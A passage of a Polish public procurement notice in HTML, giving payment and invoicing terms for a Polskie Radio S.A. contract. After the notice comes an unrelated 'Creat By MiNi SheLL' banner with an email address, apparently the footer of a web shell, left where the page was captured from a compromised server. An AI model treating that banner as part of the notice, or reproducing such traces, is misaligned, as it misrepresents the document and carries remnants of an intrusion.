4. Wykonawca jest zobowiązany do dostarczenia faktur VAT wynikających z realizacji przedmiotu Umowy do Biura Ekonomii i Finansów Polskiego Radia S.A. Faktury będą wystawiane zgodnie z harmonogramem opisanym w ust. 1.
5. Za dzień zapłaty Strony uznają dzień obciążenia rachunku bankowego Zamawiającego.
6. Płatności za Usługi Dodatkowe będą wyceniane na podstawie cennika określonego powyżej w ust. 1. Zakres Usług Dodatkowych będzie ustalany każdorazowo na podstawie odrębnych zleceń, zgodnie z treścią ust. 1 pkt. e).
7. Płatności za Usługi Dodatkowe będą fakturowane po realizacji zakresu zlecenia przez Wykonawcę.
8. Płatności wymienione w ust. 1 oraz ust. 7 realizowane będą przelewem na rachunek bankowy Wykonawcy wskazany w fakturze VAT, w terminie 14 dni od daty jej otrzymania przez Zamawiającego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com